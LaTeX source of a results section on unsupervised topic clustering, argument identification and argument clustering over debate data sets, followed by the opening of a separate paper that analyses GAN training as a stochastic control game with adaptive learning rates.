on a subset of the \emph{debatepedia} data set with 170 topics. The simple model $ARGMAX_{none}^{tfidf}$ computes clusters based on words with the highest tf-idf score within a document. Its $ARI$ score of $0.470$ indicates that many topics in the \emph{debatepedia} data set can already be represented by a single word. Considering the $ARGMAX_{lsa}^{tfidf}$ model, the lower $ARI$ score of $0.368$ indicate that using the topics found by LSA does not add value compared to tf-idf vectors.
Furthermore, we evaluate k-means with the density-based clustering algorithm HDBSCAN.
First, we find that $HDBSCAN_{lsa + umap}^{tfidf}$ and $KMEANS_{none}^{tfidf}$ with $ARI$ scores of $0.694$ and $0.703$, respectively, achieve a comparable performance on the tf-idf vectors. However, since HDBSCAN accounts for noise is the data which it pools within a single cluster, the five rightmost columns of Table \ref{tab:Results:ClusteringUnsupervised} have to be considered when deciding on a clustering method for further use. When excluding the noise cluster from the evaluation and thereby considering only approx. 96\% of instances where $HDBSCAN_{lsa + umap}^{tfidf}$ and $HDBSCAN_{umap}^{tfidf}$ are sure about the cluster membership, the $ARI$ score of the clustering amounts to $0.78$. Considering that 21.1\% of $HDBSCAN_{none}^{tfidf}$ are classified as noise, compared to the 4.3 \% of $HDBSCAN_{umap}^{tfidf}$, we conclude that applying an UMAP dimensionality reduction step before the HDBSCAN clustering is essential for its performance on the \emph{debatepedia} data set.
\textbf{Qualitative Evaluation.} Looking at the predicted clusters reveals that many of the clusters considered as erroneous are reasonable. For example, $HDBSCAN_{lsa + umap}^{tfidf}$ maps the document with the title \emph{`Military recruiting: Does NCLB rightly allow military recruiting in schools?'} of the topic \emph{`No Child Left Behind Act'} to the cluster representing the topic \emph{`Military recruiting in public schools'}.
Another such example is a cluster that is largely comprised of documents about \emph{`Gay adoption'}, but contains one additional document \emph{`Parenting: Can homosexuals do a good job of parenting?'} from the topic \emph{`Gay marriage'}.
\textbf{Inductive Generalization.}
We apply the unsupervised approach to the \emph{debate.org} data set to evaluate whether the model is able to generalize. The results, given in Table \ref{tab:Results:ClusteringUnsupervisedORG}, show that the unsupervised approach using HDBSCAN and k-means leads to far better results with $ARI$ scores of 0.354 and 0.436, respectively. K-means performs on the \emph{debate.org} data set distinctly better than HDBSCAN because the \emph{debate.org} data set is characterized by an high number of single-element topics. In contrast to k-means, HDBSCAN does not allow single-element clusters, thus getting pooled into a single noise cluster. Furthermore, this is reflected by the different numbers of clusters as well as the lower homogeneity scores of HDBSCAN of 0.633 and 0.689 compared to 0.822 of k-means while having a comparable completeness of approx. 0.8.
\textbf{Topic Clusters for Argument-Query Matching.}
Applying a keyword search would retrieve only a subset of the relevant arguments that mention the search phrase explicitly. Combining a keyword search on documents with the clusters found by $HDBSCAN$, enables an argument search framework to retrieve arguments from a broader set of documents. For example, in the data set \textit{debatepedia.org}, we observe that clusters of arguments related to \emph{gay adoption} include words like \emph{parents}, \emph{mother}, \emph{father}, \emph{sexuality}, \emph{heterosexual}, and \emph{homosexual} while neither \emph{gay} nor \emph{adoption} are not mentioned explicitly.
\subsubsection{Argument Identification}
\label{sec:Results:SEG}
The results of the argument identification step based on the \emph{Student Essay} data set is given in Table \ref{tab:Results:Segmentation}. We evaluate a BiLSTM model in a sequence-labeling setting compared to a feedforward neural network (FNN) in a classification setting in order to investigate the importance of context for the identification of arguments. Using the BiLSTM improves the macro $F_1$ score relative to the feedforward neural network on the \emph{bert-avg} embeddings by 3.9\% and on the \emph{bert-cls} embeddings by 15.2\%. Furtheremore, we evaluate the effects of using the sentence embedding \emph{bert-avg} and \emph{bert-cls}.
Using \emph{bert-cls} embeddings increases the macro $F_1$ score by 4.3\% in the classification setting and by 15.6\% in the sequence-learning setting relative to using \emph{bert-avg}. Considering also the sequence-learning and classification results, we conclude that the \emph{bert-cls} embeddings encode important additional information which gets only utilized in a sequence-learning setting.
Our results also reflect the peculiarity of the \emph{Student Essay}'s training data set that most sentences are part of an argument and only $\sim$3\% of the sentences are labeled as outside (`O'). Accordingly, the models observe hardly any examples for outside sentences during training and, thus, have difficulties in learning to distinguish them from other sentences. Overall, this is reflected by the very low precision and recall for the class `O'. Considering the fact that the correct identification of a `B' sentence alone is already enough to separate two arguments from each other, the purpose of labeling a sentence as `O' is restricted to classifying the respective sentence as non-argumentative. Therefore, in case of the \emph{Student Essay} data set, the task of separating two arguments from each other becomes much more important than separating non-argumentative sentences from arguments. Therefore, the last column of Table \ref{tab:Results:Segmentation} indicates the macro $F_1$ score only for the `B' and `I' labels with a macro $F_1$ score of 0.956 for our best model. This reflects the model's high ability to separate arguments from each other.
Furthermore, we evaluate whether the previously best-performing model $BILSTM_{cls}^{bert}$ is able to identify arguments on the \emph{debate.org} data set if trained on the \emph{Student Essay} data set. The results are given in Table \ref{tab:Results:SegORG}.
The pretrained model performs very poor on \emph{`O'} sentences since not many examples of \emph{`O'} sentences were observed during training. Moreover, applying the pretrained $BILSTM_{cls}^{bert}$ to the \emph{debate.org} data set yields very low precision and recall on \emph{`B'} sentences. In contrast to the \emph{Student Essay} data set where arguments often begin with cue words (e.g., \emph{first}, \emph{second}, \emph{however}), the documents in the \emph{debate.org} data set use cue words less often, impacting the classification performance.
The results from training the $BILSTM_{cls}^{bert}$ model from scratch on the \emph{debate.org} data set are very different to our results on the \emph{Student Essay} data set. As shown in Table \ref{tab:Results:CM}, the confusion matrix for the \emph{debate.org} data set show that the BiLSTM model has difficulties to learn which sentences start an argument in the \emph{debate.org} data set. In contrast to the \emph{Student Essay} data set, it cannot learn from the peculiarities (e.g., cue words) and apparently fails to find other indications for \emph{`B'} sentences. In addition, also the distinction between \emph{`I'} and \emph{`O'} sentences is not clear. These results match our experiences with the annotation of documents in the \emph{debate.org} data set where it was often difficult to decide whether a sentence form an argument and to which argument it belongs. This is also reflected by the inter-annotator agreement of 0.24 based on Krippendorff's $\alpha$ on a subset of 20 documents with three annotators.
Overall, we find that the performance of the argument identification strongly depends on the peculiarities and quality of the underlying data set. For well curated data sets such as the \emph{Student Essay} data set, the information contained in the current sentence as well as the surrounding sentences yield an accurate identification of arguments. In contrast, data sets with poor structure or colloquial language, as given in the \emph{debate.org} data set, lead to less accurate results
\subsubsection{Argument Clustering}
\label{sec:Results:AS}
In the final step of the argument search framework, we evaluate the argument clustering according to topical aspects based on the \emph{debatepedia} data set. Therefore, we evaluate the performance of the clustering algorithms HDBSCAN and k-means for different document embeddings that yielded the best results in the topic clustering step of our framework. We estimate the parameter $k$ for the k-means algorithm for each topic using a linear regression based on the number of clusters relative to the number of arguments in this topic. As shown in Figure \ref{fig:Results:Correlation}, we observe a linear relationship between the number of topical aspects and the argument count per topic in the \emph{debatepedia} data set. As shown in Table \ref{tab:Results:ASUnsupervised}, we perform the clustering based on the arguments in each ground-truth topic separately and average the results across the topics. We observe that HDBSCAN performs best on tf-idf embeddings with an averaged $ARI$ score of 0.085 while k-means achieves its best performance on \emph{bert-avg} embeddings with an averaged $ARI$ score of 0.065. Using HDBSCAN instead of k-means on tf-idf embeddings yields an improvement in the $ARI$ score of 2.7\%. Using k-means instead of HDBSCAN on \emph{bert-avg} and \emph{bert-cls} embeddings results in an improvement of 4.7\% and 2.8\%, respectively.
Using an UMAP dimensionality reduction step before applying HDBSCAN outperforms k-means on \emph{bert-avg} embeddings with an $ARI$ score of 0.069. However, on tf-idf embeddings using an UMAP dimensionality reduction step slightly reduces the performance. Comparing the results of using \emph{bert-cls} embeddings versus \emph{bert-avg} embeddings, we find that \emph{bert-avg} embeddings result in slightly better scores with a maximum improvement of 2.1\%. We further compare calculating tf-idf vectors only within each topic relative to computing them based on all arguments in the whole dataset (\emph{across topics}). This change only affects the document frequencies used to calculate the tf-idf scores. Therefore, terms that are characteristic for a given topic are likely to show higher document frequencies and thus lower tf-idf scores when the computation is performed within each topic. Since tf-idf scores indicate the relevance of each term, clustering algorithms focus more on terms which distinguish the arguments from each other within a topic.
Accordingly, the observed deviation of the $ARI$ score by 0.9\% for k-means and 6.1\% for HDBSCAN in combination with UMAP matches our expectation.
We also evaluated the exclusion of the HDBSCAN noise clusters (\emph{without noise}) yielding an $ARI$ score of 0.140 and a $BCubed~F_1$ score of 0.439.
Furthermore, we show in Table \ref{tab:Results:BestTopics} for the best performing k-means and HDBSCAN models the topics with the highest $ARI$ scores. We observe that the clustering performance on topics with the best clustering performance is still relative low, in particular when compared to the results of the topic clustering step. As indicated by decreasing $ARI$ scores, both models have only a few topics where they perform comparatively well.
Figure~\ref{fig:Results:Scatterplot} shows the performance of the two models with respect to the number of arguments in each topic. Both $ARI$ and $BCubed~F_1$ scores show a very similar distribution for topics with different numbers of arguments, while the distributions of the homogeneity score show a slight difference for the two models. This indicates that the performance of the clustering algorithms does not depend on the number of arguments.
Moreover, the upper histogram in Figure \ref{fig:Results:Hist} displays the distribution of the degree of consensus between the two models based on the $ARI$ scores for each topic. Comparing this with the distribution of the $ARI$ score computed between the HDBSCAN model and the ground-truth displayed on the histogram below, we observe that the consensus between the two models is, for most topics, rather low.
Overall, our results show the difficulties of argument clustering based on topical aspects.
Based on the \emph{debatepedia} data set, we show that unsupervised clustering algorithm with the proposed embedding methods cannot cluster arguments into topical aspects in a consistent and reasonable way. This result is in line with the results of Reimers et al.~\cite{Reimers2019} stating that even experts have difficulties to identify argument similarity based on topical aspects.
Considering that their evaluation is based on sentence-level arguments, it seems likely that assessing argument similarity is even harder for arguments comprised of one or multiple sentences.
Moreover, the authors report promising results for the pairwise assessment of argument similarity when using the output corresponding to the BERT $[CLS]$ token.
However, our experiments show that their findings do not apply to \emph{debatepedia} data set. We assume that this is due to differences in argument similarity that are introduced by using prevalent topics in the \emph{debatepedia} data set rather than using explicitly annotated arguments.
\fi
\subsection{Evaluation Results}
\label{sec:Results}
In the following, we present the results for the three tasks topic clustering, argument identification, and argument clustering.
\subsubsection{Topic Clustering}
\label{sec:Results:DS}
We start with the results of clustering the documents by topics based on
the \emph{debatepedia} data set with 170 topics (see Table \ref{tab:Results:ClusteringUnsupervised}). The plain model $ARGMAX_{none}^{tfidf}$, which computes clusters based on words with the highest tf-idf score within a document, achieves an $ARI$ score of $0.470$. This indicates that many topics in the \emph{debatepedia} data set can already be represented by a single word. Considering the $ARGMAX_{lsa}^{tfidf}$ model, the $ARI$ score of $0.368$ shows that using the topics found by LSA does not add value compared to tf-idf.
Furthermore, we
find that the tf-idf-based
$HDBSCAN_{lsa + umap}^{tfidf}$ and $KMEANS_{none}^{tfidf}$ achieve a comparable performance given the $ARI$ scores of $0.694$ and $0.703$. However, since HDBSCAN accounts for noise in the data which it pools within a single cluster, the five rightmost columns of Table \ref{tab:Results:ClusteringUnsupervised} need to be considered when deciding on a clustering method for further use. When excluding the noise cluster from the evaluation,
the $ARI$ score increases considerably for all $HDBSCAN$ models ($HDBSCAN_{none}^{tfidf}$: $0.815$, $HDBSCAN_{umap}^{tfidf}$: $0.779$, $HDBSCAN_{lsa+umap}^{tfidf}$: $0.775$). Considering that $HDBSCAN_{none}^{tfidf}$ identifies 21.1\% of the instances as noise, compared to the 4.3\%
in case of $HDBSCAN_{umap}^{tfidf}$, we conclude that applying an UMAP dimensionality reduction step before the HDBSCAN clustering is quite fruitful for the performance (at least for the \emph{debatepedia} data set).
\begin{table*}[tb]
\centering
\caption{Results of argument identification on the \emph{Student Essay} data set.
}
\label{tab:Results:Segmentation}
\begin{small}
\begin{tabular}{@{}l cc cc cc ccc@{}}
\toprule
& \multicolumn{2}{c}{\emph{B}}& \multicolumn{2}{c}{\emph{I}}& \multicolumn{2}{c}{\emph{O}}& \multicolumn{2}{r}{}\\ \cline{2-3} \cline{4-5} \cline{6-7}
& $Prec.$ & $Rec.$
& $Prec.$ & $Rec.$
& $Prec.$ & $Rec.$
&$F_{1, macro}$ & $F_{1, weighted}$ &$F_{1, macro}^{B, I}$ \\
\midrule
majority class
& 0.000 & 0.000
& 0.719 & 1.000
& 0.000 & 0.000
& 0.279 & 0.602 & 0.419\\
$FNN_{avg}^{bert}$
& 0.535 & 0.513
& 0.820 & 0.836
& 0.200 & 0.160
& 0.510 & 0.736 & 0.675\\
$FNN_{cls}^{bert}$
& 0.705 & 0.593
& 0.849 & 0.916
& \textbf{0.400} & 0.080
& 0.553 & 0.805 & 0.763\\
$BILSTM_{avg}^{bert}$
& 0.766 & 0.713
& 0.885 & 0.930
& 0.000 & 0.000
& 0.549 & 0.846 & 0.823 \\
$BILSTM_{cls}^{bert}$
& \textbf{0.959} & \textbf{0.914}
& \textbf{0.967} & \textbf{0.985}
& 0.208 & \textbf{0.200}
& \textbf{0.705} & \textbf{ 0.951} & \textbf{0.956} \\
\bottomrule
\end{tabular}
\end{small}
\end{table*}
\begin{table*}[tb]
\centering
\caption{Argument identification results on the \emph{debate.org} data set; model trained on \emph{Student Essay} and \emph{debate.org}.}
\label{tab:Results:SegORG}
\begin{small}
\begin{tabular}{@{}ll cc cc cc cc@{}}
\toprule
& & \multicolumn{2}{c}{\emph{B}}& \multicolumn{2}{c}{\emph{I}}& \multicolumn{2}{c}{\emph{O}}& \multicolumn{2}{r}{}\\
\cline{3-8}
&\emph{trained on}
& $Prec.$ & $Rec.$
& $Prec.$ & $Rec.$
& $Prec.$ & $Rec.$
&$F_{1, macro}$ & $F_{1, weighted}$ \\
\midrule
$BILSTM_{cls}^{bert}$ & \emph{Student Essay}
& 0.192 & 0.312
& 0.640 & 0.904
& 1.000 & 0.015
& 0.339 & 0.468\\
$BILSTM_{cls}^{bert}$ &\emph{debate.org}
& 1.000 & 0.021
& 0.646 & 0.540
& 0.381 & 0.640
& 0.368 & 0.492\\
\bottomrule
\end{tabular}
\end{small}
\end{table*}
\textbf{Inductive Generalization.}
We apply our unsupervised approaches to the \emph{debate.org} data set to evaluate whether the model is able to generalize. The results, given in Table \ref{tab:Results:ClusteringUnsupervisedORG}, show that
k-means performs distinctly better on the \emph{debate.org} data set than HDBSCAN (ARI: $0.436$ vs. $0.354$ and $0.330$; $F_1$: $0.644$ vs. $0.479$ and $0.520$). This is likely because the \emph{debate.org} data set is characterized by a high number of single-element topics. In contrast to k-means, HDBSCAN does not allow single-element clusters, thus getting pooled into a single noise cluster. This is reflected by the different numbers of clusters as well as the lower homogeneity scores of HDBSCAN of 0.633 and 0.689 compared to 0.822 of k-means while having a comparable completeness of approx. 0.8.
\textbf{Qualitative Evaluation.}
Applying a keyword search would retrieve only a subset of the relevant arguments that mention the search phrase explicitly. Combining a keyword search on documents with the computed clusters
enables an argument search framework to retrieve arguments from a broader set of documents. For example,
for \textit{debatepedia.org}, we observe that clusters of arguments related to \emph{gay adoption} include words like \emph{parents}, \emph{mother}, \emph{father}, \emph{sexuality}, \emph{heterosexual}, and \emph{homosexual} while neither \emph{gay} nor \emph{adoption} are mentioned explicitly.
\subsubsection{Argument Identification}
\label{sec:Results:SEG}
The results of the argument identification step based on the \emph{Student Essay} data set are given in Table~\ref{tab:Results:Segmentation}. We evaluate a BiLSTM model in a sequence-labeling setting compared to
majority voting and
a feedforward neural network (FNN) as baselines.
Using the BiLSTM improves the macro $F_1$ score relative to the feedforward neural network on the \emph{bert-avg} embeddings by 3.9\% and on the \emph{bert-cls} embeddings by 15.2\%. Furthermore,
using \emph{bert-cls} embeddings increases the macro $F_1$ score by 4.3\% in the classification setting and by 15.6\% in the sequence-learning setting compared to using \emph{bert-avg}.
\textbf{BIO Tagging.}
We observe a low precision and recall for the class `O'.
This can be traced back to a peculiarity of the \emph{Student Essay} data set: Most sentences in the \emph{Student Essay}'s training data set are part of an argument and only 3\% of the sentences are labeled as non-argumentative (outside/`O'). Accordingly, the models observe hardly any examples for outside sentences during training and, thus, have difficulties in learning to distinguish them from other sentences.
Considering the fact that the correct identification of a `B' sentence alone is already enough to separate two arguments from each other, the purpose of labeling a sentence as `O' is restricted to classifying the respective sentence as non-argumentative. Therefore, in case of the \emph{Student Essay} data set, the task of separating two arguments from each other becomes much more important than separating non-argumentative sentences from arguments. In the last column of Table \ref{tab:Results:Segmentation}, we also show the macro $F_1$ score for the `B' and `I' labels only. The high macro $F_1$ score of 0.956 for the best performing model reflects the model's high ability to separate arguments from each other.
\begin{table}
\centering
\caption{Confusion matrices of $BILSTM_{cls}^{bert}$ (rows: ground-truth labels; columns: predictions).}
\label{tab:Results:CM}
\begin{footnotesize}
\begin{tabular}{c| ccc}
\multicolumn{4}{c}{Student Essay} \\
& B & I & O\\
\midrule
B&15 & 33 & 0\\
I&24 & 226 & 0 \\
O&39 & 94 & 2\\
\bottomrule
\end{tabular}
\hspace{1cm}
\begin{tabular}{c| ccc}
\multicolumn{4}{c}{debate.org} \\
& B & I & O\\
\midrule
B&1 & 24 & 23\\
I&0 & 135 & 115 \\
O&0 & 50 & 85\\
\bottomrule
\end{tabular}
\end{footnotesize}
\end{table}
\begin{table*}[tb]
\centering
\caption{Results of the clustering of arguments of the \emph{debatepedia} data set by topical aspects. \emph{across topics}:~tf-idf scores are computed across topics, \emph{without noise}:~{HDBSCAN} is only evaluated on instances not classified as noise.}
\label{tab:Results:ASUnsupervised}
\begin{small}
\begin{tabular}{@{}l l l cccc l@{}}
\toprule
Embedding & Algorithm & Dim. Reduction & $ARI$ & $Ho$ &$Co$ & $BCubed~F_1$ & Remark\\
\midrule
tf-idf & HDBSCAN & UMAP & 0.076 & 0.343 &0.366& 0.390 & \\
tf-idf & HDBSCAN & UMAP & 0.015 & 0.285 &0.300& 0.341 &\emph{across topics} \\
tf-idf & HDBSCAN & $-$ & \textbf{0.085} & \textbf{0.371} &\textbf{0.409}& \textbf{0.407} & \\
tf-idf & k-means & $-$ & 0.058 & 0.335 &0.362& 0.397 & \\
tf-idf & k-means & $-$ & 0.049 & 0.314 &0.352& 0.402 &\emph{across topics} \\
\midrule
bert-cls & HDBSCAN & UMAP & 0.030 & 0.280 &0.298& 0.357 & \\
bert-cls & HDBSCAN & $-$ & 0.016 & 0.201 &0.324& 0.378 & \\
bert-cls & k-means & $-$ & 0.044 & 0.332 &0.326& 0.369 & \\
\midrule
bert-avg & HDBSCAN & UMAP & 0.069 & 0.321 &0.352& 0.389 & \\
bert-avg & HDBSCAN & $-$ & 0.018 & 0.170 &0.325& 0.381 & \\
bert-avg & k-means & $-$ & 0.065 & 0.337 &0.349& 0.399 & \\
\midrule
tf-idf & HDBSCAN & $-$ & 0.140 & 0.429 &0.451& 0.439 &\emph{without noise}\\
\bottomrule
\end{tabular}
\end{small}
\end{table*}
\textbf{Generalizability.}
We evaluate whether the
model $BILSTM_{cls}^{bert}$, which performed best on the \emph{Student Essay} data set, is able to identify arguments on the \emph{debate.org} data set if trained on the \emph{Student Essay} data set. The results are given in Table~\ref{tab:Results:SegORG}.
Again, the pretrained model performs poor on \emph{`O'} sentences since not many examples of \emph{`O'} sentences were observed during training. Moreover, applying the pretrained $BILSTM_{cls}^{bert}$ to the \emph{debate.org} data set yields low precision and recall on \emph{`B'} sentences. A likely reason is that, in contrast to the \emph{Student Essay} data set where arguments often begin with cue words (e.g., \emph{first}, \emph{second}, \emph{however}), the documents in the \emph{debate.org} data set contain cue words less often. %
The results from training the $BILSTM_{cls}^{bert}$ model from scratch on the \emph{debate.org} data set are considerably different to our results on the \emph{Student Essay} data set. As shown in Table \ref{tab:Results:CM}, the confusion matrix for the \emph{debate.org} data set shows that the BiLSTM model has difficulties to learn which sentences start an argument in the \emph{debate.org} data set. In contrast to the \emph{Student Essay} data set, it cannot learn from the peculiarities (e.g., cue words) and apparently fails to find other indications for \emph{`B'} sentences. In addition, also the distinction between \emph{`I'} and \emph{`O'} sentences is not clear. These results match our experiences with the annotation of documents in the \emph{debate.org} data set where it was often difficult to decide whether a sentence forms an argument and to which argument it belongs. This is also reflected by the inter-annotator agreement of 0.24 based on Krippendorff's $\alpha$ on a subset of 20 documents with three annotators.
\textbf{Bottom Line.} Overall, we find that the performance of the argument identification strongly depends on the peculiarities and quality of the underlying data set. For well curated data sets such as the \emph{Student Essay} data set, the information contained in the current sentence as well as the surrounding sentences yield a considerably accurate identification of arguments. In contrast, data sets with poor structure or colloquial language, as given in the \emph{debate.org} data set, lead to less accurate results.%
\subsubsection{Argument Clustering}
\label{sec:Results:AS}
We now evaluate the argument clustering according to topical aspects (i.e., subtopics) as the final step of the argument search framework,
using the \emph{debatepedia} data set.
We evaluate the performance of the clustering algorithms HDBSCAN and k-means for different
embeddings that yielded the best results in the topic clustering step of our framework.
We perform the clustering of the arguments for each
topic (e.g., \textit{gay marriage}) separately and average the results across the topics. As shown in Table \ref{tab:Results:ASUnsupervised}, we observe that HDBSCAN performs best on tf-idf embeddings with an averaged $ARI$ score of 0.085 while k-means achieves its best performance on \emph{bert-avg} embeddings with an averaged $ARI$ score of 0.065. Using HDBSCAN instead of k-means on tf-idf embeddings yields an improvement in the $ARI$ score of 2.7\%. Using k-means instead of HDBSCAN on \emph{bert-avg} and \emph{bert-cls} embeddings results in slight improvements. %
\textbf{UMAP.} Using an UMAP dimensionality reduction step before applying HDBSCAN outperforms k-means on \emph{bert-avg} embeddings with an $ARI$ score of 0.069. However, using a UMAP dimensionality reduction in combination with tf-idf results in a slightly reduced performance.
We
find that \emph{bert-avg} embeddings result in slightly better scores than \emph{bert-cls} when using UMAP.
\textbf{TF-IDF across Topics.} We further evaluate whether computing tf-idf within each topic separately leads to a better performance than computing tf-idf
across topics in the data set.
The observed slight deviation of the $ARI$ score
for k-means and
HDBSCAN in combination with UMAP matches our expectation that
clustering algorithms focus more on terms which distinguish the arguments from each other within a topic.
\textbf{Excluding Noise.} When excluding the HDBSCAN noise clusters (\emph{without noise}), we yield an $ARI$ score of 0.140 and a $BCubed~F_1$ score of 0.439.
\textbf{Number of Arguments.} Figure~\ref{fig:Results:Scatterplot} shows the performance of the models HDBSCAN with tf-idf and k-means with \textit{bert-avg} with respect to the number of arguments in each topic. Both $ARI$ and $BCubed~F_1$ scores show a similar distribution for topics with different numbers of arguments, while the distributions of the homogeneity score show a slight difference for the two models. This indicates that the performance of the clustering algorithms does not depend on the number of arguments.
\textbf{Examples.} In Table \ref{tab:Results:BestTopics}, we show for the best performing k-means and HDBSCAN models the topics with the highest $ARI$ scores.
\begin{figure}[tb]
\centering
\includegraphics[width = 0.83\linewidth]{key_results/AS/hdbscan_scatterplot2}
\includegraphics[width = 0.83\linewidth]{key_results/AS/kmeans-bert_scatterplot2}
\caption{Number of arguments in each topic
for HDBSCAN with tf-idf embeddings and k-means with \emph{bert-avg} embeddings.}
\label{fig:Results:Scatterplot}
\end{figure}
\begin{table}[tb]
\centering
\caption{Top 5 topics
using HDBSCAN and k-means.} %
\label{tab:Results:BestTopics}
\begin{small}
\begin{tabular}{p{3.9cm} r@{}r}
\toprule
Topic & \#$Clust._{true}$ & \#$Clust._{pred}$ \\
\toprule
\multicolumn{3}{c}{\textbf{HDBSCAN based on tf-idf embeddings}}\\
\midrule
Rehabilitation vs retribution
&2 &3 \\
Manned mission to Mars
&5 &6 \\
New START Treaty
&5 &4 \\
Obama executive order to raise the debt ceiling
&3 &6 \\
Republika Srpska secession from Bosnia and Herzegovina
&4 &6 \\
\toprule
\multicolumn{3}{c}{\textbf{k-means based on \emph{bert-avg} embeddings}}\\
\midrule
Bush economic stimulus plan
&7 &5 \\
Hydroelectric dams
&11 &10 \\
Full-body scanners at airports
&5 &6 \\
Gene patents
&4 &7 \\
Israeli settlements
&3 &4 \\
\bottomrule
\end{tabular}
\end{small}
\end{table}
\textbf{Bottom Line.}
Overall, our results confirm that argument clustering based on topical aspects is nontrivival and high evaluation results are still hard to achieve in real-world settings.
Given the \emph{debatepedia} data set, we show that our unsupervised clustering algorithms with the different embedding methods do not cluster arguments into topical aspects in a highly consistent and reasonable way yet. This result is in line with the results of \citet{Reimers2019} stating that even experts have difficulties to identify argument similarity based on topical aspects (i.e., subtopics).
Considering that their evaluation is based on sentence-level arguments, it seems likely that assessing argument similarity is even harder for arguments comprised of one or multiple sentences.
Moreover, the authors report promising results for the pairwise assessment of argument similarity when using the output corresponding to the BERT $[CLS]$ token.
However, our experiments show that their findings do not apply to the \emph{debatepedia} data set. We assume that this is due to differences in the argument similarity that are introduced by using prevalent topics in the \emph{debatepedia} data set rather than using explicitly annotated arguments.
| 2024-02-18T23:40:11.267Z | 2021-12-02T02:08:28.000Z | algebraic_stack_train_0000 | 1,575 | 9,009 |
|
proofpile-arXiv_065-7746 | \section{Introduction}
\label{sec:Intro}
Generative adversarial networks (GANs) belong to the class of generative models.
The key idea behind GANs \citep{goodfellow2014generative} is to add a discriminator network in order to improve the data generation process. GANs can therefore be viewed as competing games between two neural networks: a generator network and a discriminator network. The generator network attempts to fool the discriminator network by converting random noise into sample data, while the discriminator network tries to identify whether the sample data is fake or real.
This powerful idea behind GANs leads to a versatile class of generative models with a wide range of successful applications from image generation to natural language processing \citep{denton2015deep,radford2015unsupervised, yeh2016semantic, ledig2016others, zhu2016generative, reed2016generative, vondrick2016generating, luc2016semantic, ghosh2016contextual}.\\
Inspired by the success of GANs for computer vision, there is a surge of interest in applying GANs for financial time series data generation. In such a context, the key contributions consist of adapting divergence functions and network architectures in order to cope with the time series nature and the dependence structure of financial data. For example, Quant-GAN \citep{Wiese2019,wiese2020quant} uses a TCN structure, C-Wasserstein GAN \citep{li2020generating} uses the Wasserstein distance as \citep{arjovsky2017wasserstein} and \citep{gulrajani2017improved}, FIN-GAN \citep{takahashi2019modeling} generates synthetic financial data, Corr-GAN
\citep{marti2020corrgan} adapts DCGAN structure of \citep{radford2015unsupervised} for correlation matrix of asset returns, C-GAN \citep{fu2019time} follows \citep{mirza2014conditional} to simulate realistic conditional scenarios, Sig-Wasserstein-GAN \citep{ni2020conditional} generates orders and transactions, and Tail-GAN \citep{dionelis2020tail} deals with risk management. Furthermore, activities from industrial AI labs such as JP Morgan \citep{storchan2020mas} and American Express \citep{efimov2020using} have further elevated GANs as promising tools for synthetic data generation and for model testing. (See also reviews by \citep{cao2021generative} and \citep{eckerli2021generative} for more details).\\
Despite this empirical success, there are well-recognized issues in GANs training, including the vanishing gradient when there is an imbalance between the generator and the discriminator training \citep{arjovsky2017towards}, and the mode collapse when the generator learns to produce only a specific range of samples \citep{Salimans2016}. In particular, it is hard to reproduce realistic financial time series due to well-documented stylized facts \citep{chakraborti2011econophysics,cont2001empirical} such as
heavy-tailed-and-skewed distribution of asset returns, volatility clustering, the
leverage effect, and the Zumbach effect \citep{zumbach2001heterogeneous}. For instance, \citep{takahashi2019modeling} shows that batch normalization tends to yield large fluctuations in the generated time series as well as strong auto-correlation. Moreover, Figure \ref{Fig:Plot_loss_generator_acc_discrim_CNNGan} below highlights the difficulty of convergence for GANs when a convolutional neural network is used to generate financial time series: the discriminator does not reach the desired accuracy level of $50\%$ and the generator exhibits a non-vanishing loss. (See Section \ref{sec:Exp} for a detailed description of data sources).
\begin{figure}[h!]
\center
\hspace{-2.cm} (a) Discriminator accuracy \hspace{1.5cm} (b) Generator loss \\
\includegraphics[width=0.45\textwidth]{results_accuracyDiscrim_2.pdf} \includegraphics[width=0.45\textwidth]{results_lossGen_1.pdf}
\caption{Discriminator accuracy in (a), and generator loss in (b).}
\label{Fig:Plot_loss_generator_acc_discrim_CNNGan}
\end{figure}
In response, there have been a number of theoretical studies for GANs training. \citep{Berard2020} proposes a visualization method for the GANs training process through the gradient vector field of loss functions,
\citep{Mescheder2018} demonstrates that regularization improves the convergence performance of GANs, \citep{Conforti2020} and \citep{Domingo-Enrich2020} analyze general minimax games including GANs,
and connect the mixed Nash equilibrium of the game with the invariant measure of Langevin dynamics. In the same spirit, \citep{hsieh2019finding} proposes a sampling algorithm that converges towards mixed Nash equilibria, and then \citep{kamalaruban2020robust} shows how this algorithm escapes saddle points. Recently, \citep{cao2020approximation} establishes
the continuous-time approximation for the discrete-time GANs training by coupled stochastic differential
equations, enabling the convergence analysis of GANs training via stochastic tools.
\paragraph{Our work.} The focus of this paper is to analyze GANs training in the stochastic control and game framework. It starts by revisiting vanilla GANs from the original work of \citep{goodfellow2014generative} and identifies through detailed convexity analysis one of the culprits behind the convergence issue for GANs: the lack of convexity in GANs objective function hence the general well-posedness issue in GANs minimax games. It then reformulates GANs problem as a stochastic game and uses it to study the optimal control of learning rate (and its equivalence to the optimal choice of time scale) and optimal batch size.\\
To facilitate the analysis of this type of minimax games, this paper first establishes the weak form of dynamics programming principle for a general class of stochastic games in the spirit of \citep{bouchard2011weak}; it then focuses on the particular minimax games of GANs training, by analyzing the existence and the uniqueness of viscosity solutions to Issac-Bellman equations. In particular, it obtains an explicit form for the optimal adaptive learning rate and optimal batch size which depend on the convexity of the objective function for the game.
Finally, by experimenting on synthetic data drawn either from the Gaussian distribution or the Student t-distribution and financial data collected from the Quandl Wiki Prices database, it demonstrates that training algorithms incorporating our adaptive control methodology outperform the standard ADAM optimizer, in terms of both convergence and robustness.\\
Note that the dynamic programming principle for stochastic games has been proved in a deterministic setting by \citep{evans1984differential}, and recently extended to the stochastic framework for diffusions under boundedness and regularity conditions \citep{krylov2014dynamic,bayraktar2013weak,sirbu2014martingale,sirbu2014stochastic}. The dynamic programming principle established in this paper is without the continuity assumption and is for a more general class of stochastic differential games beyond diffusions. In addition, upper and lower bounds of the value function are obtained.\\
In terms of GANs training, our analysis provides analytical support for the popular practice of ``clipping'' in GANs \citep{arjovsky2017towards}; and suggests that the convexity and well-posedness issues associated with GANs problems may be resolved by appropriate choices of hyper-parameters. In addition, our study presents a precise relation between explosion in GANs training and improper choices of the learning rate. It also reveals an interesting connection between the optimal learning rate and the standard Newton algorithm.
\paragraph{Notations.} Throughout this paper, the following notations are used:
\begin{itemize}
\item For any vector $x \in \mathbb{R}^d$ with $d \in \mathbb{N}^*$, denote by the operator $\nabla_x$ the gradient with respect to the coordinates of $x$. When there is no subscript $x$, the operator $\nabla$ refers to the standard gradient operator.
